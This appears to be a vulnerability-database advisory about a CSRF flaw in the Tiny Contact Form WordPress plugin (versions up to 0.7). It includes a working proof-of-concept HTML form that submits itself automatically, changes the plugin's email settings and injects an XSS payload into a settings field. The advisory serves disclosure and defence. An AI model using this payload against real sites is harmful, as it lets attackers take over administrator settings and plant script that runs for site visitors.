WordPress Plugin Vulnerabilities
Tiny Contact Form <= 0.7 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=tiny-contact-form" method="POST"> <input type="text" name="tcf_to_email" value="hacked"> <input type="text" name="tcf_from_email" value="hacked"> <input type="text" name="tcf_msg_ok" value=""> <input type="text" name="tcf_msg_err" value=""> <input type="text" name="tcf_submit" value=''"><img src=x onerror=alert(1)>''> <input type="text" name="tcf_subpre" value=""> <input type="text" name="tcf_field_1" value=""> <input type="text" name="tcf_field_2" value=""> <input type="text" name="tcf_field_3" value=""> <input type="text" name="tcf_field_4" value=""> <input type="text" name="tcf_field_5" value=""> <input type="text" name="tcf_captcha_label" value=""> <input type="text" name="tcf_captcha2_question" value=""> <input type="text" name="tcf_captcha2_answer" value=""> <input type="text" name="tcf_css" value=""> <input type="text" name="tcf_save" value="Änderungen speichern"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-31 (about 1 years ago)
Added
2022-05-31 (about 1 years ago)
Last Updated
2023-03-01 (about 1 years ago)